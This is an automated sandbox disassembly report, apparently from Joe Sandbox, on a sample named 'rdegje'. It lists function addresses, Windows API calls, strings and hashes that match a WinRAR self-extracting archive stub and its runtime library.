25363 efa649 25362->25363 25373 efa650 11 API calls 25362->25373 25366 efbe58 __dosmaperr 5 API calls 25365->25366 25367 efbf96 25366->25367 25368 efbfae TlsAlloc 25367->25368 25369 efbf9f 25367->25369 25368->25369 25370 ef0d7c CatchGuardHandler 5 API calls 25369->25370 25371 efa62a 25370->25371 25371->25360 25372 efa599 20 API calls 2 library calls 25371->25372 25372->25362 25373->25360 25374 ed213d 25375 ed2148 25374->25375 25376 ed2150 25374->25376 25380 ed2162 27 API calls Concurrency::cancel_current_task 25375->25380 25378 ed214e 25376->25378 25379 eefebe 27 API calls 25376->25379 25379->25378 25380->25378 26023 ed2037 142 API calls __EH_prolog 26055 ee0534 FreeLibrary 26092 ef0733 20 API calls 26024 ed2430 26 API calls std::bad_exception::bad_exception 25395 eef431 25396 eef335 25395->25396 25397 eef9e9 ___delayLoadHelper2@8 14 API calls 25396->25397 25397->25396 26093 ef9330 52 API calls 3 library calls 26096 ee2f0b GetCPInfo IsDBCSLeadByte 25416 edb20a 25417 edb21f 25416->25417 25418 edb218 25416->25418 25419 edb22c GetStdHandle 25417->25419 25426 edb23b 25417->25426 25419->25426 25420 edb293 WriteFile 25420->25426 25421 edb25f 25422 edb264 WriteFile 25421->25422 25421->25426 25422->25421 25422->25426 25424 edb325 25428 ed7951 77 API calls 25424->25428 25426->25418 25426->25420 25426->25421 25426->25422 25426->25424 25427 ed765a 78 API calls 25426->25427 25427->25426 25428->25418 25429 eef002 25430 eef00f 25429->25430 25431 edf937 53 API calls 25430->25431 25432 eef01c 25431->25432 25433 ed4a20 _swprintf 51 API calls 25432->25433 25434 eef031 SetDlgItemTextW 25433->25434 25435 eec758 5 API calls 25434->25435 25436 eef04e 25435->25436 26025 ed1800 86 API calls Concurrency::cancel_current_task 26074 ef0600 27 API calls 26057 f03100 CloseHandle 26098 eec316 GetDlgItem EnableWindow ShowWindow SendMessageW 25505 ef0612 25506 ef061e __FrameHandler3::FrameUnwindToState 25505->25506 25537 ef01ac 25506->25537 25508 ef0625 25509 ef0778 25508->25509 25512 ef064f 25508->25512 25614 ef0a0a 4 API calls 2 library calls 25509->25614 25511 ef077f 25607 ef931a 25511->25607 25523 ef068e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 25512->25523 25548 ef9ebd 25512->25548 25519 ef066e 25521 ef06ef 25556 ef0b25 GetStartupInfoW __cftof 25521->25556 25523->25521 25610 ef8e0c 38 API calls 3 library calls 25523->25610 25524 ef06f5 25557 ef9e0e 51 API calls 25524->25557 25527 ef06fd 25558 eef05c 25527->25558 25531 ef0711 25531->25511 25532 ef0715 25531->25532 25533 ef071e 25532->25533 25612 ef92bd 28 API calls _abort 25532->25612 25613 ef031d 12 API calls ___scrt_uninitialize_crt 25533->25613 25536 ef0726 25536->25519 25538 ef01b5 25537->25538 25616 ef0826 IsProcessorFeaturePresent 25538->25616 25540 ef01c1 25617 ef3bee 25540->25617 25542 ef01c6 25543 ef01ca 25542->25543 25625 ef9d47 25542->25625 25543->25508 25546 ef01e1 25546->25508 25549 ef9ed4 25548->25549 25550 ef0d7c CatchGuardHandler 5 API calls 25549->25550 25551 ef0668 25550->25551 25551->25519 25552 ef9e61 25551->25552 25553 ef9e90 25552->25553 25554 ef0d7c CatchGuardHandler 5 API calls 25553->25554 25555 ef9eb9 25554->25555 25555->25523 25556->25524 25557->25527 25716 ee1b83 25558->25716 25562 eef07c 25765 eebd1b 25562->25765 25564 eef085 __cftof 25565 eef098 GetCommandLineW 25564->25565 25566 eef13c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25565->25566 25567 eef0ab 25565->25567 25569 ed4a20 _swprintf 51 API calls 25566->25569 25769 eed708 25567->25769 25571 eef1a3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25569->25571 25780 eec8cd LoadBitmapW 25571->25780 25572 eef0b9 OpenFileMappingW 25576 eef12d CloseHandle 25572->25576 25577 eef0d1 MapViewOfFile 25572->25577 25573 eef136 25774 eeed2e 25573->25774 25576->25566 25579 eef126 UnmapViewOfFile 25577->25579 25580 eef0e2 __InternalCxxFrameHandler 25577->25580 25579->25576 25584 eeed2e 2 API calls 25580->25584 25586 eef0fe 25584->25586 25810 ee069c 82 API calls 25586->25810 25587 eea0d7 27 API calls 25589 eef203 DialogBoxParamW 25587->25589 25593 eef23d 25589->25593 25590 eef112 25811 ee0752 82 API calls _wcslen 25590->25811 25592 eef11d 25592->25579 25594 eef24f Sleep 25593->25594 25595 eef256 25593->25595 25594->25595 25597 eef264 25595->25597 25812 eebfb3 CompareStringW SetCurrentDirectoryW __cftof _wcslen 25595->25812 25598 eef283 DeleteObject 25597->25598 25599 eef29f 25598->25599 25600 eef298 DeleteObject 25598->25600 25601 eef2d0 25599->25601 25606 eef2e2 25599->25606 25600->25599 25813 eeed8b 6 API calls 25601->25813 25603 eef2d6 CloseHandle 25603->25606 25605 eef31c 25611 ef0b5b GetModuleHandleW 25605->25611 25807 eebd81 25606->25807 25943 ef9097 25607->25943 25610->25521 25611->25531 25612->25533 25613->25536 25614->25511 25616->25540 25629 ef4c97 25617->25629 25621 ef3bff 25622 ef3c0a 25621->25622 25643 ef4cd3 DeleteCriticalSection 25621->25643 25622->25542 25624 ef3bf7 25624->25542 25670 efd21a 25625->25670 25628 ef3c0d 7 API calls 2 library calls 25628->25543 25630 ef4ca0 25629->25630 25632 ef4cc9 25630->25632 25634 ef3bf3 25630->25634 25644 ef4edc 25630->25644 25649 ef4cd3 DeleteCriticalSection 25632->25649 25634->25624 25635 ef3d1c 25634->25635 25663 ef4ded 25635->25663 25639 ef3d3f 25640 ef3d4c 25639->25640 25669 ef3d4f 6 API calls ___vcrt_FlsFree 25639->25669 25640->25621 25642 ef3d31 25642->25621 25643->25624 25650 ef4d02 25644->25650 25647 ef4f14 InitializeCriticalSectionAndSpinCount 25648 ef4eff 25647->25648 25648->25630 25649->25634 25651 ef4d1f 25650->25651 25652 ef4d23 25650->25652 25651->25647 25651->25648 25652->25651 25653 ef4d8b GetProcAddress 25652->25653 25656 ef4d7c 25652->25656 25658 ef4da2 LoadLibraryExW 25652->25658 25653->25651 25655 ef4d99 25653->25655 25655->25651 25656->25653 25657 ef4d84 FreeLibrary 25656->25657 25657->25653 25659 ef4de9 25658->25659 25660 ef4db9 GetLastError 25658->25660 25659->25652 25660->25659 25661 ef4dc4 ___vcrt_FlsFree 25660->25661 25661->25659 25662 ef4dda LoadLibraryExW 25661->25662 25662->25652 25664 ef4d02 ___vcrt_FlsFree 5 API calls 25663->25664 25665 ef4e07 25664->25665 25666 ef4e20 TlsAlloc 25665->25666 25667 ef3d26 25665->25667 25667->25642 25668 ef4e9e 6 API calls ___vcrt_FlsFree 25667->25668 25668->25639 25669->25642 25671 efd237 25670->25671 25674 efd233 25670->25674 25671->25674 25676 efb860 25671->25676 25672 ef0d7c CatchGuardHandler 5 API calls 25673 ef01d3 25672->25673 25673->25546 25673->25628 25674->25672 25677 efb86c __FrameHandler3::FrameUnwindToState 25676->25677 25688 efbdf1 EnterCriticalSection 25677->25688 25679 efb873 25689 efd6e8 25679->25689 25681 efb882 25687 efb891 25681->25687 25702 efb6e9 29 API calls 25681->25702 25684 efb88c 25703 efb79f GetStdHandle GetFileType 25684->25703 25685 efb8a2 _abort 25685->25671 25704 efb8ad LeaveCriticalSection _abort 25687->25704 25688->25679 25690 efd6f4 __FrameHandler3::FrameUnwindToState 25689->25690 25691 efd718 25690->25691 25692 efd701 25690->25692 25705 efbdf1 EnterCriticalSection 25691->25705 25713 efa7eb 20 API calls __dosmaperr 25692->25713 25695 efd706 25714 ef51b9 26 API calls __cftof 25695->25714 25697 efd750 25715 efd777 LeaveCriticalSection _abort 25697->25715 25699 efd710 _abort 25699->25681 25700 efd724 25700->25697 25706 efd639 25700->25706 25702->25684 25703->25687 25704->25685 25705->25700 25707 efc2f6 __dosmaperr 20 API calls 25706->25707 25709 efd64b 25707->25709 25708 efd658 25710 efa66a _free 20 API calls 25708->25710 25709->25708 25711 efc0ca 11 API calls 25709->25711 25712 efd6aa 25710->25712 25711->25709 25712->25700 25713->25695 25714->25699 25715->25699 25717 eeffd0 25716->25717 25718 ee1b8d GetModuleHandleW 25717->25718 25719 ee1ba8 GetProcAddress 25718->25719 25720 ee1c07 25718->25720 25722 ee1bd9 GetProcAddress 25719->25722 25723 ee1bc1 25719->25723 25721 ee1f34 GetModuleFileNameW 25720->25721 25823 ef89ee 42 API calls 2 library calls 25720->25823 25732 ee1f52 25721->25732 25724 ee1beb 25722->25724 25723->25722 25724->25720 25726 ee1e74 25726->25721 25727 ee1e7f GetModuleFileNameW CreateFileW 25726->25727 25728 ee1eaf SetFilePointer 25727->25728 25729 ee1f28 CloseHandle 25727->25729 25728->25729 25730 ee1ebd ReadFile 25728->25730 25729->25721 25730->25729 25734 ee1edb 25730->25734 25735 ee1fb4 GetFileAttributesW 25732->25735 25737 ee1f7d CompareStringW 25732->25737 25738 ee1fcc 25732->25738 25814 edc619 25732->25814 25817 ee1b3b 25732->25817 25734->25729 25736 ee1b3b 2 API calls 25734->25736 25735->25732 25735->25738 25736->25734 25737->25732 25739 ee1fd7 25738->25739 25741 ee200c 25738->25741 25742 ee1ff0 GetFileAttributesW 25739->25742 25744 ee2008 25739->25744 25740 ee211b 25764 eeb65d GetCurrentDirectoryW 25740->25764 25741->25740 25743 edc619 GetVersionExW 25741->25743 25742->25739 25742->25744 25745 ee2026 25743->25745 25744->25741 25746 ee202d 25745->25746 25747 ee2093 25745->25747 25749 ee1b3b 2 API calls 25746->25749 25748 ed4a20 _swprintf 51 API calls 25747->25748 25750 ee20bb AllocConsole 25748->25750 25751 ee2037 25749->25751 25752 ee20c8 GetCurrentProcessId AttachConsole 25750->25752 25753 ee2113 ExitProcess 25750->25753 25754 ee1b3b 2 API calls 25751->25754 25824 ef4fa3 25752->25824 25756 ee2041 25754->25756 25758 edf937 53 API calls 25756->25758 25757 ee20e9 GetStdHandle WriteConsoleW Sleep FreeConsole 25757->25753 25759 ee205c 25758->25759 25760 ed4a20 _swprintf 51 API calls 25759->25760 25761 ee206f 25760->25761 25762 edf937 53 API calls 25761->25762 25763 ee207e 25762->25763 25763->25753 25764->25562 25766 ee1b3b 2 API calls 25765->25766 25767 eebd2f OleInitialize 25766->25767 25768 eebd52 GdiplusStartup SHGetMalloc 25767->25768 25768->25564 25772 eed712 25769->25772 25770 eed828 25770->25572 25770->25573 25771 ee3307 CharUpperW 25771->25772 25772->25770 25772->25771 25826 ee0752 82 API calls _wcslen 25772->25826 25775 eeffd0 25774->25775 25776 eeed3b SetEnvironmentVariableW 25775->25776 25778 eeed5e 25776->25778 25777 eeed86 25777->25566 25778->25777 25779 eeed7a SetEnvironmentVariableW 25778->25779 25779->25777 25781 eec8ee 25780->25781 25782 eec8fb GetObjectW 25780->25782 25827 eeb6d2 FindResourceW 25781->25827 25786 eec90a 25782->25786 25785 eeb5d6 4 API calls 25787 eec91d 25785->25787 25786->25785 25788 eec960 25787->25788 25789 eec93c 25787->25789 25791 eeb6d2 12 API calls 25787->25791 25799 eded62 25788->25799 25841 eeb615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25789->25841 25793 eec92d 25791->25793 25792 eec944 25842 eeb5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25792->25842 25793->25789 25795 eec933 DeleteObject 25793->25795 25795->25789 25796 eec94d 25843 eeb81c 8 API calls 25796->25843 25798 eec954 DeleteObject 25798->25788 25852 eded87 25799->25852 25804 eea0d7 25805 eefebe 27 API calls 25804->25805 25806 eea0f6 25805->25806 25806->25587 25808 eebdb0 GdiplusShutdown OleUninitialize 25807->25808 25808->25605 25810->25590 25811->25592 25812->25597 25813->25603 25815 edc62d GetVersionExW 25814->25815 25816 edc669 25814->25816 25815->25816 25816->25732 25818 eeffd0 25817->25818 25819 ee1b48 GetSystemDirectoryW 25818->25819 25820 ee1b7e 25819->25820 25821 ee1b60 25819->25821 25820->25732 25822 ee1b71 LoadLibraryW 25821->25822 25822->25820 25823->25726 25825 ef4fab 25824->25825 25825->25757 25825->25825 25826->25772 25828 eeb7e3 25827->25828 25829 eeb6f5 SizeofResource 25827->25829 25828->25782 25828->25786 25829->25828 25830 eeb70c LoadResource 25829->25830 25830->25828 25831 eeb721 LockResource 25830->25831 25831->25828 25832 eeb732 GlobalAlloc 25831->25832 25832->25828 25833 eeb74d GlobalLock 25832->25833 25834 eeb7dc GlobalFree 25833->25834 25835 eeb75c __InternalCxxFrameHandler 25833->25835 25834->25828 25836 eeb7d5 GlobalUnlock 25835->25836 25844 eeb636 GdipAlloc 25835->25844 25836->25834 25839 eeb7aa GdipCreateHBITMAPFromBitmap 25840 eeb7c0 25839->25840 25840->25836 25841->25792 25842->25796 25843->25798 25845 eeb648 25844->25845 25847 eeb655 25844->25847 25848 eeb3c8 25845->25848 25847->25836 25847->25839 25847->25840 25849 eeb3e9 GdipCreateBitmapFromStreamICM 25848->25849 25850 eeb3f0 GdipCreateBitmapFromStream 25848->25850 25851 eeb3f5 25849->25851 25850->25851 25851->25847 25853 eded95 __EH_prolog 25852->25853 25854 ededc4 GetModuleFileNameW 25853->25854 25855 ededf5 25853->25855 25856 ededde 25854->25856 25898 edab40 25855->25898 25856->25855 25858 edee25 25862 edf581 78 API calls 25858->25862 25865 edee51 25858->25865 25890 edf06a 25858->25890 25859 eda801 80 API calls 25860 eded6e 25859->25860 25896 edf5be GetModuleHandleW FindResourceW 25860->25896 25862->25858 25863 edee64 25864 ef7730 26 API calls 25863->25864 25873 edee76 ___vcrt_FlsFree 25864->25873 25909 ef7730 25865->25909 25866 edefa5 25866->25890 25929 edb000 81 API calls 25866->25929 25868 edb110 79 API calls 25868->25873 25870 edefbf ___std_exception_copy 25871 edae60 82 API calls 25870->25871 25870->25890 25874 edefe8 ___std_exception_copy 25871->25874 25873->25866 25873->25868 25873->25890 25923 edae60 25873->25923 25928 edb000 81 API calls 25873->25928 25874->25890 25893 edeff3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25874->25893 25930 ee2ed2 MultiByteToWideChar 25874->25930 25876 edf479 25880 edf4fe 25876->25880 25936 efa09e 26 API calls 2 library calls 25876->25936 25878 edf48e 25937 ef8a18 26 API calls 2 library calls 25878->25937 25881 edf534 25880->25881 25885 edf581 78 API calls 25880->25885 25886 ef7730 26 API calls 25881->25886 25883 edf4e6 25938 edf59c 78 API calls 25883->25938 25885->25880 25887 edf54d 25886->25887 25888 ef7730 26 API calls 25887->25888 25888->25890 25890->25859 25891 ee30f5 WideCharToMultiByte 25891->25893 25893->25876 25893->25890 25893->25891 25931 edf8d1 50 API calls __vsnprintf 25893->25931 25932 ef7571 26 API calls 3 library calls 25893->25932 25933 efa09e 26 API calls 2 library calls 25893->25933 25934 ef8a18 26 API calls 2 library calls 25893->25934 25935 edf59c 78 API calls 25893->25935 25897 eded75 25896->25897 25897->25804 25900 edab4a 25898->25900 25899 edabab CreateFileW 25901 edabcc GetLastError 25899->25901 25904 edac1b 25899->25904 25900->25899 25902 edcf32 GetCurrentDirectoryW 25901->25902 25903 edabec 25902->25903 25903->25904 25906 edabf0 CreateFileW GetLastError 25903->25906 25905 edac5f 25904->25905 25907 edac45 SetFileTime 25904->25907 25905->25858 25906->25904 25908 edac15 25906->25908 25907->25905 25908->25904 25910 ef7769 25909->25910 25911 ef776d 25910->25911 25922 ef7795 25910->25922 25939 efa7eb 20 API calls __dosmaperr 25911->25939 25913 ef7772 25940 ef51b9 26 API calls __cftof 25913->25940 25915 ef0d7c CatchGuardHandler 5 API calls 25917 ef7ac6 25915->25917 25916 ef777d 25918 ef0d7c CatchGuardHandler 5 API calls 25916->25918 25917->25863 25920 ef7789 25918->25920 25920->25863 25921 ef7ab9 25921->25915 25922->25921 25941 ef7650 5 API calls CatchGuardHandler 25922->25941 25924 edae6c 25923->25924 25925 edae73 25923->25925 25924->25873 25925->25924 25927 eda9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25925->25927 25942 ed77bd 77 API calls 25925->25942 25927->25925 25928->25873 25929->25870 25930->25893 25931->25893 25932->25893 25933->25893 25934->25893 25935->25893 25936->25878 25937->25883 25938->25880 25939->25913 25940->25916 25941->25922 25942->25925 25944 ef90a3 _unexpected 25943->25944 25945 ef90bc 25944->25945 25946 ef90aa 25944->25946 25967 efbdf1 EnterCriticalSection 25945->25967 25979 ef91f1 GetModuleHandleW 25946->25979 25949 ef90af 25949->25945 25980 ef9235 GetModuleHandleExW 25949->25980 25952 ef90c3 25954 ef9138 25952->25954 25965 ef9161 25952->25965 25988 ef9bb0 20 API calls _abort 25952->25988 25958 ef9150 25954->25958 25959 ef9e61 _abort 5 API calls 25954->25959 25956 ef917e 25971 ef91b0 25956->25971 25957 ef91aa 25989 f03550 5 API calls CatchGuardHandler 25957->25989 25960 ef9e61 _abort 5 API calls 25958->25960 25959->25958 25960->25965 25968 ef91a1 25965->25968 25967->25952 25990 efbe41 LeaveCriticalSection 25968->25990 25970 ef917a 25970->25956 25970->25957 25991 efc236 25971->25991 25974 ef91de 25977 ef9235 _abort 8 API calls 25974->25977 25975 ef91be GetPEB 25975->25974 25976 ef91ce GetCurrentProcess TerminateProcess 25975->25976 25976->25974 25978 ef91e6 ExitProcess 25977->25978 25979->25949 25981 ef925f GetProcAddress 25980->25981 25982 ef9282 25980->25982 25987 ef9274 25981->25987 25983 ef9288 FreeLibrary 25982->25983 25984 ef9291 25982->25984 25983->25984 25985 ef0d7c CatchGuardHandler 5 API calls 25984->25985 25986 ef90bb 25985->25986 25986->25945 25987->25982 25988->25954 25990->25970 25992 efc25b 25991->25992 25993 efc251 25991->25993 25994 efbe58 __dosmaperr 5 API calls 25992->25994 25995 ef0d7c CatchGuardHandler 5 API calls 25993->25995 25994->25993 25996 ef91ba 25995->25996 25996->25974 25996->25975 25997 efd211 31 API calls CatchGuardHandler 26027 eeb410 GdipDisposeImage GdipFree

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00EE1B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00EE1B9C
                      • Part of subcall function 00EE1B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EE1BAE
                      • Part of subcall function 00EE1B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EE1BDF
                      • Part of subcall function 00EEB65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00EEB665
                      • Part of subcall function 00EEBD1B: OleInitialize.OLE32(00000000), ref: 00EEBD34
                      • Part of subcall function 00EEBD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EEBD6B
                      • Part of subcall function 00EEBD1B: SHGetMalloc.SHELL32(00F1A460), ref: 00EEBD75
                    • GetCommandLineW.KERNEL32 ref: 00EEF09B
                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00EEF0C5
                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00EEF0D6
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00EEF127
                      • Part of subcall function 00EEED2E: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EEED44
                      • Part of subcall function 00EEED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EEED80
                      • Part of subcall function 00EE0752: _wcslen.LIBCMT ref: 00EE0776
                    • CloseHandle.KERNEL32(00000000), ref: 00EEF12E
                    • GetModuleFileNameW.KERNEL32(00000000,00F30CC0,00000800), ref: 00EEF148
                    • SetEnvironmentVariableW.KERNEL32(sfxname,00F30CC0), ref: 00EEF154
                    • GetLocalTime.KERNEL32(?), ref: 00EEF15F
                    • _swprintf.LIBCMT ref: 00EEF19E
                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00EEF1B3
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00EEF1BA
                    • LoadIconW.USER32(00000000,00000064), ref: 00EEF1D1
                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 00EEF222
                    • Sleep.KERNEL32(?), ref: 00EEF250
                    • DeleteObject.GDI32 ref: 00EEF289
                    • DeleteObject.GDI32(?), ref: 00EEF299
                    • CloseHandle.KERNEL32 ref: 00EEF2DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                    • API String ID: 3014515783-3710569615
                    • Opcode ID: 5f345bea0f47dbe96fbc39ec3d879d33413965f4625cf4b2f314540f0450621c
                    • Instruction ID: d557ef885b3ac5ec13337d9dd5233087287fb51ffa45f7b7f3a982d5dc22f84e
                    • Opcode Fuzzy Hash: 5f345bea0f47dbe96fbc39ec3d879d33413965f4625cf4b2f314540f0450621c
                    • Instruction Fuzzy Hash: 9461FDB150138CABD321AB62EC49FAB7BDCFB49754F011029F641F22A2DB749D44E762
                    APIs
                    • __EH_prolog.LIBCMT ref: 00ED92CB
                      • Part of subcall function 00EDD656: _wcsrchr.LIBVCRUNTIME ref: 00EDD660
                      • Part of subcall function 00EDCAA0: _wcslen.LIBCMT ref: 00EDCAA6
                      • Part of subcall function 00EE1907: _wcslen.LIBCMT ref: 00EE190D
                      • Part of subcall function 00EDB5D6: _wcslen.LIBCMT ref: 00EDB5E2
                      • Part of subcall function 00EDB5D6: __aulldiv.LIBCMT ref: 00EDB60E
                      • Part of subcall function 00EDB5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00EDB615
                      • Part of subcall function 00EDB5D6: _swprintf.LIBCMT ref: 00EDB640
                      • Part of subcall function 00EDB5D6: _wcslen.LIBCMT ref: 00EDB64A
                      • Part of subcall function 00EDB5D6: _swprintf.LIBCMT ref: 00EDB6A0
                      • Part of subcall function 00EDB5D6: _wcslen.LIBCMT ref: 00EDB6AA
                      • Part of subcall function 00ED4727: __EH_prolog.LIBCMT ref: 00ED472C
                      • Part of subcall function 00EDA212: __EH_prolog.LIBCMT ref: 00EDA217
                      • Part of subcall function 00EDB8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00EDB5B5,?,?,?,00EDB405,?,00000001,00000000,?,?), ref: 00EDB8FA
                      • Part of subcall function 00EDB8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00EDB5B5,?,?,?,00EDB405,?,00000001,00000000,?,?), ref: 00EDB92B
                    Strings
                    • __tmp_reference_source_, xrefs: 00ED9596
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                    • String ID: __tmp_reference_source_
                    • API String ID: 70197177-685763994
                    • Opcode ID: 45d01729da86e390fd0a37bb67ed295912be6963bb420c1ff9562dbefad2ce29
                    • Instruction ID: 8fe54b9615ba1d1d1ffd382b5166ee78228971cc8fc2784386f538e06ad7635f
                    • Opcode Fuzzy Hash: 45d01729da86e390fd0a37bb67ed295912be6963bb420c1ff9562dbefad2ce29
                    • Instruction Fuzzy Hash: 23A2E571904245AEDF15DF64CC95BE9BBA4EF05308F0821BBE949BB383D7309A46CB61
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,00EF9186,?,00F0D570,0000000C,00EF92DD,?,00000002,00000000), ref: 00EF91D1
                    • TerminateProcess.KERNEL32(00000000,?,00EF9186,?,00F0D570,0000000C,00EF92DD,?,00000002,00000000), ref: 00EF91D8
                    • ExitProcess.KERNEL32 ref: 00EF91EA
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: feb06be886813fbda10df65aa9737a3bc33583c6d62ecea5363197d02c0fb804
                    • Instruction ID: cc6e8304fe255ada692b3f5df36a94f4e35aa39ae10e7ef99717c6a7878bb3f0
                    • Opcode Fuzzy Hash: feb06be886813fbda10df65aa9737a3bc33583c6d62ecea5363197d02c0fb804
                    • Instruction Fuzzy Hash: 40E0463100010CABDF126F60DD08A693B6AFB40342F014024FF88AB132CB36ED82DA80
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00EDE79B,00000001,?,?,?,00000000,00EE66C2,?,?,?), ref: 00EDB22E
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00EE66C2,?,?,?,?,?,00EE6184,?), ref: 00EDB275
                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00EDE79B,00000001,?,?), ref: 00EDB2A1
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: FileWrite$Handle
                    • String ID:
                    • API String ID: 4209713984-0
                    • Opcode ID: 787a88a2d782b620e3f46de9a0fbf5f3e7bf49170a081f881f70c1b7f339d8a6
                    • Instruction ID: f0920ca23aeddd79d6efe5be5b15be63cee8a9de96b51c615f1186d8c69817ce
                    • Opcode Fuzzy Hash: 787a88a2d782b620e3f46de9a0fbf5f3e7bf49170a081f881f70c1b7f339d8a6
                    • Instruction Fuzzy Hash: 5B31D372248305EFDB14CF10D808BAE77A5FB80719F01151EF581773A0DB74A94ADBA2
                    APIs
                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 00EFC19D
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
